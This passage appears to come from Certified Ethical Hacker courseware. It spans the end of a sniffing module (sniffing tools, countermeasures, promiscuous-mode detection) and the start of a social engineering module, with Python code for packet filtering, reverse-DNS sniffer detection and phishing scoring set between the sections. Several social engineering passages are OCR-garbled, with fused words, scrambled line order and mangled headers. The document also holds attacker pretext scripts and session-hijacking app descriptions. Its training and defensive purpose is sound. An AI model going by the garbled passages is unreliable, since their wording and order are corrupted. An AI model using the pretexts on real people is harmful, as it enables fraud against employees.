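                raise ValueError("missing closing parenthesis")
            return result
        if kind != "field":
            raise ValueError(f"expected a field or protocol name, got {text!r}")
        if self._next()[0] == "op" and self._next()[1] in COMPARE:
            op, (_, wanted) = self._next(consume=True)[1], self._next(consume=True)
            if op == "!=":  # treated as !(field == value); Wireshark's own != on multi-valued fields has differed between versions
                return not _matches(self.pkt, text, "==", wanted)
            return _matches(self.pkt, text, op, wanted)
        return text in self.pkt["protocols"]  # bare protocol name such as "icmp"

def apply_filter(filter_text, packets):
    """Return the frame numbers of the packets matching the display filter."""
    tokens = tokenize(filter_text)
    return [p["frame.number"] for p in packets if FilterEvaluator(tokens, p).evaluate()]

SAMPLE_PACKETS = [  # constructed stand-in for a capture, not real traffic
    {"frame.number": 1, "frame.pkt_len": 60, "protocols": {"eth", "arp"}},
    {"frame.number": 2, "frame.pkt_len": 74, "protocols": {"eth", "ip", "tcp", "telnet"},
     "ip.src": "192.168.1.100", "ip.dst": "10.0.1.50", "tcp.srcport": 51000, "tcp.dstport": 23},
    {"frame.number": 3, "frame.pkt_len": 500, "protocols": {"eth", "ip", "icmp"},
     "ip.src": "10.0.0.4", "ip.dst": "10.0.1.12"},
    {"frame.number": 4, "frame.pkt_len": 90, "protocols": {"eth", "ip", "udp", "dns"},
     "ip.src": "192.168.1.100", "ip.dst": "192.168.1.1", "udp.srcport": 53211, "udp.dstport": 53},
    {"frame.number": 20, "frame.pkt_len": 600, "protocols": {"eth", "ip", "icmp"},
     "ip.src": "205.153.63.30", "ip.dst": "10.0.1.12"},
]
```

Running `apply_filter("ip.addr==192.168.1.100 && tcp.port==23", SAMPLE_PACKETS)` returns `[2]`, the telnet frame, while the same filter with `tcp.port eq 25 or icmp` returns the two ICMP frames.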
Sniffing Tools (Cont'd)

- SteelCentral Packet Analyzer
  Source: https://www.riverbed.com
  SteelCentral Packet Analyzer provides a graphical console for high-speed packet analysis. This tool comes integrated with Riverbed AirPcap adapters to analyze and troubleshoot 802.11 wireless networks.
  As it captures terabytes of packet data traversing the network, this tool reads that traffic and displays it in a graphical user interface (GUI). It can analyze multi-gigabyte recordings from locally presented trace files or on remote SteelCentral NetShark probes (physical, virtual, or embedded on SteelHeads) without a large file transfer, to identify anomalous network issues or diagnose and troubleshoot complex network and application performance issues down to the bit level.
  Attackers can use SteelCentral Packet Analyzer to capture and monitor long-duration network traffic as well as to analyze different types of data on the network.

Figure 8.55: Screenshot of SteelCentral Packet Analyzer

- Capsa Network Analyzer
  Source: https://www.colasoft.com
  Capsa Network Analyzer is a network-monitoring tool that captures all the data transmitted over the network and provides a wide range of analysis statistics in an intuitive and graphic way. The tool helps to analyze and troubleshoot the problem that has occurred (if any) in the network. It is also able to perform advanced protocol analyzing, in-depth packet decoding, reliable network forensics, and automatic expert diagnosis. It helps you to detect network vulnerabilities.
  An attacker can use this tool to sniff packets from the target network and detect network vulnerabilities.

Figure 8.56: Screenshot of Capsa Network Analyzer

- OmniPeek
  Source: https://www.liveaction.com
  OmniPeek Network Analyzer provides real-time visibility and expert analysis of each part of the target network. This tool will analyze, drill down, and fix performance bottlenecks across multiple network segments. Analytic plug-ins provide targeted visualization and search abilities within OmniPeek. The Google Maps plug-in enhances the analysis capabilities of OmniPeek. It displays a Google map in the OmniPeek capture window that shows the locations of all the public IP addresses of captured packets.
  Attackers can use OmniPeek to monitor and analyze network traffic of the target network in real time, identify the source location of that traffic, and attempt to obtain sensitive information, as well as find any network loopholes.

Figure 8.57: Screenshot of OmniPeek

Some examples of additional sniffing tools are listed below:

- Observer Analyzer (https://www.viavisolutions.com)
- PRTG Network Monitor (https://www.paessler.com)
- SolarWinds Deep Packet Inspection and Analysis (https://www.solarwinds.com)
- Xplico (https://www.xplico.org)
- Colasoft Packet Builder (https://www.colasoft.com)
Packet Sniffing Tools for Mobile Phones

- Sniffer Wicap
  Source: https://play.google.com
  This tool is a mobile network packet sniffer for ROOT ARM droids. It works on rooted Android mobile devices. Attackers can use this tool to capture packets for various types of connections, such as Wi-Fi, 3G, and LTE.

Figure 8.58: Screenshot of Sniffer Wicap

- FaceNiff
  Source: http://faceniff.ponury.net
  FaceNiff is an Android app that can sniff and intercept web session profiles over a Wi-Fi connection to a mobile. This app works on rooted Android devices. The Wi-Fi connection should be over open, WEP, WPA-PSK, or WPA2-PSK networks while sniffing the sessions.

Figure 8.59: Screenshot of FaceNiff

- Packet Capture
  Source: https://play.google.com
  Packet Capture is a network traffic sniffer app with SSL decryption. It is a powerful debugging tool, especially when developing an app.
  Attackers can use this tool to capture network packets and record them, perform SSL decryption using MITM techniques, and further show packets in either hex or text.

Figure 8.60: Screenshot of Packet Capture
Module Flow

Countermeasures

The previous section describes how an attacker carries out sniffing with different techniques and tools. This section describes countermeasures and possible defensive techniques used to defend a target network against sniffing attacks.
How to Defend Against Sniffing

Listed below are some of the countermeasures to be followed to defend against sniffing:

- Restrict physical access to the network media to ensure that a packet sniffer cannot be installed
- Use end-to-end encryption to protect confidential information
- Permanently add the MAC address of the gateway to the ARP cache
- Use static IP addresses and ARP tables to prevent attackers from adding the spoofed ARP entries for machines in the network
- Turn off network identification broadcasts and, if possible, restrict the network to authorized users to protect the network from being discovered with sniffing tools
- Use IPv6 instead of IPv4
- Use encrypted sessions such as SSH instead of telnet, Secure Copy (SCP) instead of FTP, and SSL for email connection to protect wireless network users against sniffing attacks
- Use HTTPS instead of HTTP to protect usernames and passwords
- Use a switch instead of the hub, as a switch delivers data only to the intended recipient
- Use Secure File Transfer Protocol (SFTP) instead of FTP for secure transfer of files
- Use PGP and S/MIME, VPN, IPSec, SSL/TLS, SSH, and one-time passwords (OTP)
- Use POP2 or POP3 instead of POP to download emails from email servers
- Use SNMPv3 instead of SNMPv1 and SNMPv2 to manage networked devices
- Always encrypt the wireless traffic with a strong encryption protocol such as WPA or WPA2
- Retrieve MAC addresses directly from NICs instead of the OS; this prevents MAC address spoofing
- Use tools to determine if any NICs are running in promiscuous mode
- Use the concept of Access Control List (ACL) to allow access only to a fixed range of trusted IP addresses in a network
- Change default passwords to complex passwords
- Avoid broadcasting SSIDs (Session Set Identifiers)
- Implement a MAC filtering mechanism on your router
- Implement network scanning and monitoring tools to detect malicious intrusions, rogue devices, and sniffers connected to the network
Module Flow

Sniffing Detection Techniques

It is very difficult to detect passive sniffers, especially when they are running on a shared Ethernet. This section discusses some sniffing detection techniques.
How to Detect Sniffing

It is not easy to detect a sniffer on a network as it only captures data and runs in promiscuous mode. Promiscuous mode allows a network device to intercept and read each network packet that arrives in its entirety. The sniffer leaves no trace as it does not transmit data. To find sniffers, check for systems that are running in promiscuous mode, which is an NIC mode that allows all packets (traffic) to pass without validating their destination address. Standalone sniffers are difficult to detect because they do not transmit data traffic. The reverse DNS lookup method helps to detect non-standalone sniffers. There are many tools, such as Nmap, that are available to use for the detection of promiscuous mode. Run IDS and note whether the MAC addresses of certain machines have changed (for example, the router's MAC address). An IDS can detect sniffing activities on a network. It notifies or alerts the administrator when a suspicious activity, such as sniffing or MAC spoofing, occurs. Network tools such as Capsa Portable Network Analyzer monitor the network for strange packets such as those with spoofed addresses. This tool can collect, consolidate, centralize, and analyze traffic data across different network resources and technologies.
Sniffer Detection Techniques

Ping Method

To detect a sniffer on a network, identify the system on the network running in promiscuous mode. The ping method is useful in detecting a system that runs in promiscuous mode, which in turn helps to detect sniffers installed on the network. Just send a ping request to the suspected machine with its IP address and incorrect MAC address. The Ethernet adapter will reject it because the MAC address does not match, whereas the suspect machine running the sniffer responds to it, as it does not reject packets with a different MAC address. Thus, this response will identify the sniffer in the network.

Figure 8.61: Promiscuous mode

DNS Method

The reverse DNS lookup is the opposite of the DNS lookup method. Sniffers using reverse DNS lookup increase network traffic. This increase in network traffic can be an indication of the presence of a sniffer on the network. The computers on this network are in promiscuous mode. Users can perform a reverse DNS lookup remotely or locally. Monitor the organization's DNS server to identify incoming reverse DNS lookups. The method of sending ICMP requests to a non-existing IP address can also monitor reverse DNS lookups. The computer performing the reverse DNS lookup would respond to the ping, thus identifying it as hosting a sniffer.

For local reverse DNS lookups, configure the detector in promiscuous mode. Send an ICMP request to a non-existing IP address and view the response. If the system receives a response, the user can identify the responding machine as performing reverse DNS lookups on the local machine. A machine generating reverse DNS lookup traffic will most likely be running a sniffer.

Figure 8.63: Sniffing detection using the DNS method
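The DNS method above can be automated on the defender's side: after pinging a few addresses that do not exist on the segment, watch the resolver's query log for PTR lookups of exactly those addresses. The block below is an added example written for this page, not EC-Council's own tooling; the log lines are constructed and only loosely follow BIND's query-log layout, and the decoy addresses are assumed to be unassigned on the 192.168.0.0/24 segment.

```python
import re
from collections import defaultdict

# Loosely modelled on BIND's query log format (constructed, not a real log)
_QUERY_LINE = re.compile(
    r"client (?:@\S+ )?(?P<src>\d{1,3}(?:\.\d{1,3}){3})#\d+ \([^)]*\): "
    r"query: (?P<qname>\S+) IN (?P<qtype>[A-Z]+)")


def ptr_to_ip(qname):
    """Turn a reverse-zone name such as 250.0.168.192.in-addr.arpa back into 192.168.0.250."""
    name = qname.lower().rstrip(".")
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) != 4 or not all(label.isdigit() and int(label) < 256 for label in labels):
        return None
    return ".".join(reversed(labels))


def parse_query_log(lines):
    """Yield (source IP, query name, query type) for every line that looks like a query."""
    for line in lines:
        m = _QUERY_LINE.search(line)
        if m:
            yield m.group("src"), m.group("qname"), m.group("qtype")


def find_reverse_lookup_sniffers(lines, decoy_addresses, threshold=2):
    """Map each DNS client that reverse-resolved at least `threshold` decoys to those addresses.

    The decoys are the non-existent addresses the detector pinged; nothing on the
    segment should ever need their names, so a host asking for them was reading
    traffic that was not addressed to it.
    """
    decoys = set(decoy_addresses)
    hits = defaultdict(set)
    for src, qname, qtype in parse_query_log(lines):
        if qtype != "PTR":
            continue
        ip = ptr_to_ip(qname)
        if ip in decoys:
            hits[src].add(ip)
    return {src: sorted(ips) for src, ips in hits.items() if len(ips) >= threshold}


# Constructed decoys: addresses the detector pinged that are unassigned on the segment
DECOY_ADDRESSES = ["192.168.0.250", "192.168.0.251", "192.168.0.252"]

# Constructed query-log excerpt: .2 reverse-resolves every decoy, .3 does ordinary lookups,
# .7 reverse-resolves a single decoy (below the default threshold)
SAMPLE_LOG = """\
10-Mar-2020 14:02:11.101 client 192.168.0.3#40001 (www.example.com): query: www.example.com IN A + (192.168.0.1)
10-Mar-2020 14:02:12.220 client 192.168.0.2#51234 (250.0.168.192.in-addr.arpa): query: 250.0.168.192.in-addr.arpa IN PTR + (192.168.0.1)
10-Mar-2020 14:02:12.231 client 192.168.0.2#51235 (251.0.168.192.in-addr.arpa): query: 251.0.168.192.in-addr.arpa IN PTR + (192.168.0.1)
10-Mar-2020 14:02:12.240 client 192.168.0.2#51236 (252.0.168.192.in-addr.arpa): query: 252.0.168.192.in-addr.arpa IN PTR + (192.168.0.1)
10-Mar-2020 14:02:13.005 client 192.168.0.3#40002 (1.0.168.192.in-addr.arpa): query: 1.0.168.192.in-addr.arpa IN PTR + (192.168.0.1)
10-Mar-2020 14:02:14.777 client 192.168.0.7#53000 (250.0.168.192.in-addr.arpa): query: 250.0.168.192.in-addr.arpa IN PTR + (192.168.0.1)
10-Mar-2020 14:02:15.300 client 192.168.0.7#53001 (mail.example.com): query: mail.example.com IN MX + (192.168.0.1)
""".splitlines()


if __name__ == "__main__":
    for src, ips in find_reverse_lookup_sniffers(SAMPLE_LOG, DECOY_ADDRESSES).items():
        print(f"{src} reverse-resolved decoy addresses {', '.join(ips)}: likely running a sniffer")
```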
ARP Method

This technique sends a non-broadcast ARP to all the nodes in the network. The node that runs in promiscuous mode on the network will cache the local ARP address. Then, it will broadcast a ping message on the network with the local IP address but a different MAC address. In this case, only the node that has the MAC address (cached earlier) will be able to respond to your broadcast ping request. A machine in promiscuous mode replies to the ping message, as it has the correct information about the host that is sending ping requests in its cache; the remaining machines will send an ARP probe to identify the source of the ping request. This will detect the node on which the sniffer is running.

Figure 8.64: Detecting sniffing via the ARP method
Promiscuous Detection Tools

- Nmap
  Source: https://nmap.org
  Nmap's NSE script allows you to check whether a system on a local Ethernet has its network card in promiscuous mode.
  Command to detect NIC in promiscuous mode:
  nmap --script=sniffer-detect [Target IP Address/Range of IP addresses]

Figure 8.65: Screenshot showing Nmap output

- NetScanTools Pro
  Source: https://www.netscantools.com
  NetScanTools Pro includes the Promiscuous Mode Scanner tool to scan your subnet for network interfaces listening for all Ethernet packets in promiscuous mode. Security professionals use NetScanTools Pro to scan the subnet with modified ARP packets and identify devices responding to each type of ARP packet.

Figure 8.66: Screenshot of NetScanTools Pro Promiscuous Mode Scanner
Module Summary

In this module, we have discussed sniffing concepts along with protocols vulnerable to sniffing and various hardware protocol analyzers. We have also discussed various sniffing techniques, such as MAC attacks, DHCP attacks, ARP poisoning, spoofing attacks, and DNS poisoning, along with their countermeasures. This module also illustrated various sniffing tools. In this module, we have also discussed various countermeasures to be employed to prevent sniffing attacks. This module ended with a detailed discussion on various sniffing detection techniques.

In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, perform social engineering to steal critical information related to the target organization.
CEH | Certified Ethical Hacker

Module 09: Social Engineering

Module Objectives

- Understanding Social Engineering Concepts
- Understanding Insider Threats
- Understanding Impersonation on Social Networking Sites
- Understanding Different Social Engineering Countermeasures
- Understanding Different Insider Threats and Identity Theft Countermeasures
Module Objectives

This module provides an overview of social engineering. Although it focuses on fallacies and advocates effective countermeasures, the possible methods of extracting information from another human being rely on attackers' ingenuity. The features of these techniques make them an art, but the psychological nature of some of these techniques makes them a science. The "bottom line" is that there is no ready defense against social engineering; only constant vigilance can circumvent some social engineering techniques used by attackers.

This module provides insight into human-based, computer-based, and mobile-based social engineering techniques. It also discusses various insider threats, impersonation on social networking sites, and identity theft, as well as possible countermeasures.

At the end of this module, you will be able to:

- Describe social engineering concepts
- Perform social engineering using various techniques
- Describe insider threats
- Perform impersonation on social networking sites
- Describe identity theft
- Apply social engineering countermeasures
- Apply knowledge of insider threats and identity theft countermeasures
Module Flow

Social Engineering Concepts

There is no single security mechanism that can protect from the social engineering techniques used by attackers. Only educating employees on how to recognize and respond to social engineering attacks can minimize attackers' chances of success. Before going ahead with this module, it is first necessary to discuss various social engineering concepts.

This section describes social engineering, frequent targets of social engineering, behaviors vulnerable to attack, factors making companies vulnerable to attack, why social engineering is effective, the principles of social engineering, and the phases of a social engineering attack.
What is Social Engineering?

Social engineering is the art of convincing people to reveal confidential information. Social engineers depend on the fact that people are unaware of the valuable information to which they have access.

Factors that Make Companies Vulnerable to Attacks:
- Insufficient security training
- Unregulated access to information
- Lack of security policies

Why is Social Engineering Effective?
- Security policies are as strong as their weakest link
- It is difficult to detect social engineering attempts
- There is no method that can be applied to ensure complete security from social engineering attacks
- There is no specific hardware or software for defending against a social engineering attack
Whatis SocialEngineering?
Beforeperforming information
a socialengineeringattack,the attackergathers about the
target fromvarious
organization sources suchas:
‘Theorganization's IDs,names,andemailaddresses
whereemployees’
officialwebsites,
are shared

ical andCountermensores
Mackin ©by E-Comel
Copyright
ofthetargetorganization
Advertisements mediarevealinformation
cast through such
as products
andoffers.
Blogs,
forums,andotheronlinespaceswhereemployees sharebasicpersonaland
organizational
information.
After gathering
information,
an attackerexecutes socialengineering attacksusing various
approaches piggybacking,
suchas impersonation, tailgating,
reverse social
engineering,and
othermethods
Socialengineeringis the art of manipulating people to divulge
sensitive informationto use it to
perform s ome malicious action. Despite securitypolicies, attackerscan compromisean
organization's sensitive informationbyusing socialengineering, whichtargets the weakness of
people, Most often,employees are not even aware of a security lapse o n their part and
inadvertently revealthe organization's criticalinformation.Forinstance, unwittingly answering
strangers’
questions or replying to spamemail
To succeed, attackerstake a special interest i n developing socialengineeringskillsand can be
so proficient that the victims might not even notice the fraud.Attackersalways lookfor new
waysto accessinformation, They alsoensure that theyknowthe organization’s perimeter and
the people on its perimeter, suchas security guards, and help-desk
receptionists, workers, to
exploithumanoversight. People haveconditionedthemselves to not beoverly suspicious,and
theyassociatespecific behaviorsandappearanceswith knownentities. Forinstance, a m an i n a
Uniform carryinga pileof packages fordelivery will beperceived as a delivery person.Withthe
helpof socialengineering tricks,attackerssucceedi n obtaining confidentialinformation,
authorization, and access detailsfrom people by deceiving and manipulating human
vulnerability
CommonTargets of SocialEngineering

Asocialengineerusesthe vulnerability
people
of humannature as theirmost effective
believeandtrust othersandderivefulfillmentfromhelping
are the most common targets
the needy.
ofsocialengineeringin an organization:
tool. Usually,
Discussed below

Receptionistsand Help-Desk Personnel:Socialengineersgenerally targetservice-desk


or help-desk personnel bytricking them into divulging confidentialinformationabout
the organization. To extract information, suchas a phone numberor password, the
attackerfirst wins the trust of the individualwith the information.On winningtheir
trust, the attackermanipulates them to get valuableinformation. Receptionistsand
help-desk staff may readilyshareinformationif theyfeel theyare doing so to helpa
customer.
TechnicalSupport Executives: Another targetof socialengineersis technicalsupport
executives.Thesocialengineersmaytakethe approach of contactingtechnicalsupport
executives to obtain sensitive informationbypretending to be senior management,
customers, vendors,or otherfigures.

SystemAdministrators: is responsible
A systemadministratori n an organization for
Thus,theymayhavecriticalinformationsuchas the typeand
the systems,
maintaining

ical andCountermensores
Mackin ©by E-Comel
Copyright
version thatcouldbe helpful
of OSandadminpasswords, foran attackerin planning
an
attack.
Users andClients:Attackerscouldapproachusers andclientsof the target
organization,
pretending
to bea techsupport personto extractsensitive information,
Vendorsof the Target
Organization:
Attackersmay also targetthe vendorsof the
organization
to
gain
critical
that
could
information helpi n executing
Senior Executives:Attackerscould also approach
attacks.
senior executives from various
departmentssuchas Finance, HR,and CxOsto obtain criticalinformationabout the
organization
Impact of Social Engineering Attack on an Organization
Social engineering does not seem like a serious threat, but it can lead to substantial losses for organizations. The impacts of social engineering attacks on organizations include:
- Economic Losses: Competitors may use social engineering techniques to steal sensitive information such as the development plans and marketing strategies of the target company, which can result in an economic loss.
- Damage to Goodwill: For an organization, goodwill is important for attracting customers. Social engineering attacks may damage that goodwill by leaking sensitive organizational data.
- Loss of Privacy: Privacy is a major concern, especially for big organizations. If an organization is unable to maintain the privacy of its stakeholders or customers, then people can lose trust in the company and may discontinue their business association with the organization. Consequently, the organization could face losses.
- Dangers of Terrorism: Terrorism and anti-social elements pose a threat to an organization's assets, people, and property. Terrorists may use social engineering techniques to make blueprints of their targets in order to infiltrate them.
- Lawsuits and Arbitration: Lawsuits and arbitration result in negative publicity for an organization and affect the business's performance.
- Temporary or Permanent Closure: Social engineering attacks can result in a loss of goodwill. Lawsuits and arbitration may force the temporary or permanent closure of an organization and its business activities.
Behaviors Vulnerable to Attacks
Authority
Authority implies the right to exercise power in an organization. Attackers take advantage of this by presenting themselves as a person of authority, such as a technician or an executive, in a target organization to steal important data.
For example, an attacker can call a user on the phone and claim to be working as a network administrator in the target organization. The attacker then informs the victim about a security incident in the network and asks them to provide their account credentials to protect their data against theft. After obtaining the victim's credentials, the attacker steals sensitive information from the victim's account.
Intimidation
Intimidation refers to an attempt to intimidate a victim into taking several actions by using bullying tactics. It is usually performed by impersonating some other person and manipulating users into disclosing sensitive information.
For example, an attacker might call the executive's receptionist with this request: "Mr. Tibiyani is about to give a big presentation to the customers, but he is unable to open his files; it seems they are corrupt. He told me to call you and ask you to send the files to me immediately so that he can start his talk."
Consensus or Social Proof
Consensus or social proof refers to the fact that people are usually willing to like things or do things that other people like or do. Attackers take advantage of this by doing things like creating fake websites and posting testimonials from users about the benefits of certain products such as anti-malware (rogueware). Therefore, if users search the Internet to download the rogueware, they encounter these websites and believe the forged testimonials. Further, if users download the malicious product, attackers may install a trojan along with it.
Scarcity

Scarcity implies the state of being scarce. In the context of social engineering, scarcity often implies creating a feeling of urgency in a decision-making process. Due to this urgency, attackers can control the information provided to victims and manipulate the decision-making process.
For example, when Apple releases a new iPhone product that sells out and goes out of stock, attackers can take advantage of this situation by sending a phishing email to the target users, encouraging them to click on a link provided in the email to buy the product. If the users click on this link, they get redirected to some malicious website controlled by the attacker. As a result, the user might end up revealing their account details or downloading some malicious programs such as trojans.
Urgency
Urgency implies encouraging people to take immediate action. Attackers can take advantage of this by tricking victims into performing unintended tasks.
For example, ransomware often uses the urgency principle, which makes the victim take urgent action under a time limit. The victims see the countdown timer running on their infected systems and know that failure to make the required decision within the given time can result in the loss of important data. Similarly, attackers can send phishing emails indicating that a certain product is available at a low price and that the user should click on the "Buy Now" link to buy it. The user is tricked, and they click on the link to take immediate action. As a result, they are redirected to a malicious website and end up revealing their account details or downloading a virus file.
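Both the scarcity lure and the urgency lure above end the same way: pressure wording in the message and a link whose visible text does not match where it actually goes. A mail filter can score for exactly those two signals. The following is an added example, not code from the courseware: it scores constructed sample HTML e-mail bodies for urgency and scarcity cues and for anchor elements whose displayed host differs from the href's host. The cue phrases, host names, and sample messages are all constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Phrases that press the reader to act at once (urgency) or suggest the offer
# is about to vanish (scarcity). Constructed list for this example.
URGENCY_CUES = (
    "act now", "immediately", "within 24 hours", "limited stock",
    "only a few left", "buy now", "final notice", "will be suspended",
)


class _LinkExtractor(HTMLParser):
    """Collect (visible text, href) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def _site(host):
    """Reduce a host to its last two labels. Simplification: this ignores
    multi-label public suffixes such as co.uk."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def _host_in_text(text):
    """Host name a reader would see in the link text, if any."""
    m = re.search(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", text.lower())
    return m.group(1) if m else ""


def score_message(html_body):
    """Score one HTML e-mail body for the lures described above.

    Returns (score, reasons): one point per urgency/scarcity cue in the
    visible text and one per link whose displayed host differs from the
    host the href actually points to.
    """
    reasons = []
    visible_text = re.sub(r"<[^>]+>", " ", html_body).lower()
    for cue in URGENCY_CUES:
        if cue in visible_text:
            reasons.append(f"urgency cue: {cue!r}")

    extractor = _LinkExtractor()
    extractor.feed(html_body)
    for text, href in extractor.links:
        shown = _host_in_text(text)
        actual = urlparse(href).hostname or ""
        if shown and actual and _site(shown) != _site(actual):
            reasons.append(f"link shows {shown!r} but goes to {actual!r}")
    return len(reasons), reasons


# Constructed sample messages: one modelled on the out-of-stock iPhone lure
# above, one ordinary newsletter that should score zero.
SAMPLE_MESSAGES = {
    "iphone_lure": (
        "<p>The new iPhone is back in stock, but only a few left! Order at "
        '<a href="http://apple.example-deals.test/checkout">www.apple.com/shop</a> '
        "and buy now before midnight.</p>"
    ),
    "newsletter": (
        "<p>Our monthly update is out. Read it at "
        '<a href="https://news.example.org/2020/06">news.example.org</a>.</p>'
    ),
}

if __name__ == "__main__":
    for name, body in SAMPLE_MESSAGES.items():
        print(name, *score_message(body))
```

The lure scores three (two cues plus the mismatched link) and the newsletter scores zero. The host comparison is the part worth keeping: a brand name in the anchor text is what the victim reads, while the href is where the browser goes, and the two are compared after reducing each to its registrable-looking domain so that a legitimate subdomain does not trip the check.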

Familiarity or Liking
Familiarity or liking implies that people are more likely to be persuaded to do something when they are asked by someone whom they like. This indicates that people are more likely to buy products if they are advertised by an admired celebrity.
For example, people are more likely to allow someone to look over their shoulder if they like that person or are familiar with them. If people do not like the person, they immediately recognize the shoulder surfing attack and prevent it. Similarly, people often allow someone to tailgate them if they like that person or are familiar with them. In some cases, social engineers use a charming smile and sweet-talk to deceive the other person into liking them.
Trust

Attackers often attempt to build a trusting relationship with victims. For example, an attacker can call a victim and introduce themself as a security expert. Then, they may claim that they were working with XYZ company and that they noticed some unusual errors sent from the victim's system. The attacker builds trust by using the company name and their experience in the security field. After establishing trust, the attacker guides the victim to follow a series of steps to "view and disable the system errors." They later send an email containing a malicious file and persuade the victim to click on and download it. Through this process, the attacker successfully installs malware on the victim's system, infecting it and allowing the attacker to steal important information.

Greed
Some people are possessive by nature and seek to acquire vast amounts of wealth through illegal activities. Social engineers lure their targets to divulge information by promising something for nothing (appealing to their greed). For example, an attacker may pretend to be a competitor and lure the employees of the target into revealing critical information by offering a considerable reward.
Factors that Make Companies Vulnerable to Attacks
Many factors make companies vulnerable to social engineering attacks; some of them are as follows:
Insufficient Security Training
Employees can be ignorant about the social engineering tricks used by attackers to lure them into divulging sensitive data about the organization. Therefore, the minimum responsibility of any organization is to educate their employees about social engineering techniques and the threats associated with them to prevent social engineering attacks.
Unregulated Access to Information
For any company, one of its main assets is its database. Providing unlimited access or allowing everyone access to such sensitive data might cause trouble. Therefore, companies must ensure proper training and surveillance of key personnel for accessing sensitive data.
Several Organizational Units
Some organizations have their units at different geographic locations, making it difficult to manage the system. Further, this sort of setup makes it easier for an attacker to access the organization's sensitive information.
Lack of Security Policies
Security policy is the foundation of security infrastructure. It is a high-level document describing the security controls implemented in a company. An organization should take extreme measures related to every possible security threat or vulnerability. Implementation of certain security measures such as a password change policy, information sharing policy, access privileges, unique user identification, and centralized security prove to be beneficial.
Why is Social Engineering Effective?
Like other techniques, social engineering does not deal with network security issues; instead, it deals with the psychological manipulation of a human being to extract desired information. The following are reasons why social engineering continues to be effective:
- Despite various security policies, preventing social engineering is a challenge because human beings are most susceptible to variation.
- It is challenging to detect social engineering attempts. Social engineering is the art and science of manipulating people into divulging information.
- No method guarantees complete security from social engineering attacks.
- No specific hardware or software is available to safeguard against social engineering attacks.
- This approach is relatively cheap (or free) and easy to implement.

Phases of a Social Engineering Attack
Slide: Research the Target Company (dumpster diving, websites, employees, tour of the company); Select a Target (identify the frustrated employees of the target company); Develop a Relationship (develop a relationship with the selected employees); Exploit the Relationship.
Attackers take the following steps to execute a successful social engineering attack:
Research the Target Company
Before attacking the target organization's network, an attacker gathers enough information to infiltrate the system. Social engineering is one technique that helps in extracting information. Initially, the attacker researches basic information about the target organization, such as the nature of the business, its location, number of employees, and other facts. While researching, the attacker indulges in activities such as dumpster diving, browsing the company's website, and finding employee details.
Select a Target
After finishing their research, the attacker selects a target for extracting sensitive information about the organization. Usually, attackers try to reach out to disgruntled employees because they are easier to manipulate.
Develop a Relationship
Once the target is set, the attacker builds a relationship with that employee to accomplish their task.
Exploit the Relationship
The attacker exploits the relationship and extracts sensitive information about the organization's finance information, accounts, technologies in use, and upcoming plans.
Module Flow
Slide: module flow (sections include Insider Threats and Countermeasures).
Social Engineering Techniques
Attackers implement various social engineering techniques to gather sensitive information from people or organizations that might help them to commit fraud or participate in other criminal activities. This section deals with various human-based, computer-based, and mobile-based social engineering techniques, coded with examples for a better understanding.
Types of Social Engineering
Slide: Human-based (sensitive information gathered by interaction); Computer-based; Mobile-based (sensitive information is gathered with the help of mobile apps).
In a social engineering attack, the attacker uses their social skills to trick the victim into disclosing personal information such as credit card numbers, bank account numbers, and phone numbers, or confidential information about their organization or computer system. Attackers use this data to either launch an attack or to commit fraud. Social engineering attacks are categorized into three categories: human-based, computer-based, and mobile-based.

Human-based Social Engineering
Human-based social engineering involves human interaction. Acting as though they were a legitimate person, the attacker interacts with the employee of the target organization to collect sensitive information, such as business plans and networks, that might help them in launching their attack. For example, impersonating an IT support technician, the attacker can easily access the server room.
An attacker can perform human-based social engineering by using the following techniques:
- Impersonation
- Vishing
- Eavesdropping
- Shoulder Surfing
- Dumpster Diving
- Reverse Social Engineering
- Piggybacking
- Tailgating
- Diversion Theft
- Honey Trap
- Baiting
- Quid Pro Quo
- Elicitation
Computer-based Social Engineering
Computer-based social engineering relies on computers and Internet systems to carry out the targeted action. The following techniques can be used for computer-based social engineering:
- Phishing
- Spam mail
- Pop-up window attacks
- Scareware
- Instant chat messenger
Mobile-based Social Engineering
Attackers use mobile applications to carry out mobile-based social engineering. Attackers trick the users by imitating popular applications and creating malicious mobile applications with attractive features, then submitting them to the major app stores with the same name. Users unknowingly download the malicious app, allowing the malware to infect their device. Listed below are some techniques attackers use to perform mobile-based social engineering:
- Publishing malicious apps
- Repackaging legitimate apps
- Using fake security applications
- SMiShing (SMS Phishing)
Human-based Social Engineering
Slide: Impersonation. The attacker pretends to be someone legitimate or an authorized person, either personally or using a communication medium; impersonation helps attackers trick the target into revealing sensitive information. Impersonation examples follow.
Human-based Social Engineering (Cont'd)
Slide: Impersonation (Vishing), Third-party Authorization, Tech Support. Vishing (voice or VoIP phishing) is an impersonation technique in which the attacker uses Voice over IP technology to trick individuals into revealing personal and financial information (electronic fraud).
Human-based Social Engineering (Cont'd)
Slide: Eavesdropping, Shoulder Surfing, Dumpster Diving.
Human-based Social Engineering (Cont'd)
Slide: Reverse Social Engineering, Piggybacking, Tailgating.
Human-based Social Engineering (Cont'd)
Slide: Baiting, Quid Pro Quo.
Human-based Social Engineering
Impersonation
Impersonation is a common human-based social engineering technique where an attacker pretends to be a legitimate or authorized person. Attackers perform impersonation attacks personally or use a phone or another communication medium to mislead their target and trick them into revealing information. The attacker might impersonate a courier or delivery person, janitor, businessman, client, or technician, or they may pretend to be a visitor. Using this technique, the attacker gathers sensitive information by scanning terminals for passwords, searching for important documents on employees' desks, rummaging through bins, and through other tactics. The attacker may even try to overhear confidential conversations and "shoulder surf" to obtain sensitive information.
Types of impersonation used in social engineering:
- Posing as a legitimate end-user
- Posing as an important user
- Posing as a technical support agent
- Posing as an internal employee, client, or vendor
- Posing as a repairman
- Abusing the over-helpfulness of the help desk
- Posing as someone with third-party authorization
- Posing as a tech support agent through vishing
- Posing as a trusted authority
